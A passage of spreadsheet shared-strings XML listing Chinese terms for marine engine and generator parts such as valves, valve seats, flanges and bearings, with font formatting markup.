  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二级进气口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二极管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二极管，稳压</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二位二通阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>错位报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机管系布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机海水出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机冷却管支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机轴承滑油出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机组的要求规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机车间位置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机加热预热器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机油漆</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发货模式等级</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发货形式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀单元安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀单元阀椎体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀单元符号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀导杆更换</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀导套更换</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀导向密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀的滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀底座环更换</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀底座研磨机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆，半成品</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆，精加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆冲头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆底座检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆阀座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆阀座研磨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆阀座研磨机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆密封环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆模板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆针</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀滚轮导套的布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀和喷射泵用滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀间隙的调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀件铭牌</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀进口检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀控制</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀门研磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀体控制盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀推力块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀箱总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀修理工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀旋转器检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀转动机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀装置，离心滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀装置的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀装置及燃油泵安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀锥体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀锥体块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座环，进气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座环，排气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座孔再加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座模板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座磨削工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座圈安装装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座圈拆卸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座研磨机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰板的说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰防护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰封盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰连接设计数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰联轴器，部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰装配部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法语说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>反馈法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>反馈环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>反馈面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
